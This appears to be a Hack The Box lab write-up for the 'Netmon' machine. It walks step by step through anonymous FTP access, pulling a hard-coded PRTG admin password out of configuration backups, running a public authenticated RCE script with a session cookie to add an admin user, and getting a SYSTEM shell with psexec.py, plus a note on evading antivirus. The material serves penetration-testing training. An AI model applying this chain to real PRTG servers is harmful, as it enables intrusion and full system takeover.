Netmon (w/o Meterpreter)

IP: 10.10.10.152

Recon

nmap -T4 -A -p- 10.10.10.152

21 open ftp Microsoft FTP

ftp-anom: Anonymous FTP login allowed

Looks like it lists C:\ files

80 open http Indy httpd 18.1.37.13946 (Paessler PRTF bandwidth monitor)

135 open msrpc Windows RPC

139 open netbios-ssn Windows netbios-ssn

445 open microsoft-ds Windows Server 2008 R2 - 2012 microsoft-ds

5985 open http HTTPAPI httpd 2.0 (SSDP/UPnP)

47001 open http HTTPAPI httpd 2.0 (SSDP/UPnP)

Other RPC open ports 49664,49665,49666,49667,49668,49669

Enumeration

We can use FTP port 21 to enumerator C:\ and find user flag.

Routing to port 80 server, we get prompt to login on index.htm. Lets google PRTG Network Monitor for default credentials. We find default credentials are prtgadmin. (Heads up! It doesn't work)

At bottom of page we find that its running PRTG Network Monitor 18.1.37.13946.

Lets google for exploits on PRTG Network Monitor. We find an Authenticated RCE exploit (https://www.exploit-db.com/exploits/46527), although we do not have credentials we can further search for where PRTG Net Mon stores its database or password database since we have C:/ access with ftp. We find a page that contains information on where all files are stored (https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data).

Lets anonm log into FTP and search for the path \AllUsersProfile\Application data\Paessler\PRTG Network Monitor\

ftp 10.10.10.152
Name: anonymous
Password: anonymous

ls
cd Users
ls -la
cd "All Users"
ls -la
cd "Application Data" # We get access denied
cd "Application Data\Paessler\PRTG Network Monitor" # This should work
ls -la

get "PRTG Configuration.dat"
get "PRTG Configuration.old"
get "PRTG Configuration.old.bak"

Nice! We got the database files, lets grep each file for admin user prtgadmin to see if password is hard-coded.

cat PRTG\ Configuration.dat | grep -C 10 prtgadmin
cat PRTG\ Configuration.old | grep -C 10 prtgadmin
cat PRTG\ Configuration.old.bak | grep -C 10 prtgadmin

Aha! We found the password PrTg@dmin2018 hard-coded under the old backup database file.

But trying the following credentials on the admin page doesn't work... prtgadmin:PrTg@dmin2018. Changing 2018 to 2019 works... of course it does. Shows how strong password policies are.

Now that we are authenticated, lets go back to the Authenticated RCE exploit we found (https://www.exploit-db.com/exploits/46527). Looking at usage of bash script, we will need cookies. Let's grab the cookies of our authenticated session, you can use burp to capture cookies, cookie editor browser extension, or web developer tool to get your cookie. (For Firefox this is Storage tool)

Lets copy bash script and create a h4ck3r_script.sh and copy the content. (Put a new line before #!/bin/bash , if you have issues script not declaring as bash). Make sure to allow execute, chmod +x h4ck3r_script.sh. Now lets run the script.

./h4ck3r_script.sh -u http://10.10.10.152 -c "OCTOPUSXXXX=XXXXXXXX"

The script created a user pentest with password of P3nT3st!.

Lets use impacket's psexec.py to create a reverse shell. if you don't have psexec.py you can install via https://github.com/SecureAuthCorp/impacket.git . Make sure to git clone within your /opt/.

Run the following command:

psexec.py pentst:'P3nT3st!'@10.10.10.152

#You will get shell!
whoami #Shows nt authority\system

You could also use wmiexec.py or smbexec.py but get more functionality from psexec.py. Benefit of using these tools instead of meterpreter shell (besides use in OSCP) is that meterpreter can easily be picked up by anti-virus.